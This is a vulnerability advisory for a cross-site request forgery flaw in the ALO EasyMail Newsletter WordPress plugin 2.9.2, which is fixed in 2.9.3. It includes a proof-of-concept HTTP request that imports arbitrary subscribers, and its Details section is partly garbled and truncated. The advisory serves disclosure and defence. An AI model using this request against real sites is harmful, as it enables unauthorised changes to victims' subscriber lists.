------------------------------------------------------------------------ Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0021 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the ALO EasyMail Newsletter WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on ALO EasyMail Newsletter [2] WordPress Plugin version 2.9.2. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in ALO EasyMail Newsletter version 2.9.3 [3]. ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ ALO EasyMail Newsletter [2] is a plugin for WordPress that allows to write and send newsletters, and to gather and manage the subscribers. It supports internationalization and multilanguage. It was discovered that the ALO EasyMail Newsletter WordPress Plugin is vulnerable to Cross-Site Request Forgery. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ A number of actions within ALO EasyMail Newsletter consist of two steps. The 'step one' action is protected against Cross-Site Request Forgery by means of the check_admin_referer() WordPress function. = '2.6.5') check_admin_referer('alo-easymail_subscribers'); Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link. ------------------------------------------------------------------------ Proof of concept ------------------------------------------------------------------------ POST /wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: Connection: close Content-Type: multipart/form-data; boundary=---------------------------17016644981835490787491067954 Content-Length: 645 -----------------------------17016644981835490787491067954 Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv" Content-Type: text/plain sumofpwn@securify.n;Summer of Pwnage;en -----------------------------17016644981835490787491067954 Content-Disposition: form-data; name="post_type" newsletter -----------------------------17016644981835490787491067954 Content-Disposition: form-data; name="action" import_step2 -----------------------------17016644981835490787491067954 Content-Disposition: form-data; name="doaction_step2" Upload CSV file -----------------------------17016644981835490787491067954--[h3]References[/h3] [1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_alo_easymail_newsletter_wordpress_plugin.html [2] https://wordpress.org/plugins/alo-easymail/ [3] https://downloads.wordpress.org/plugin/alo-easymail.2.9.3.zip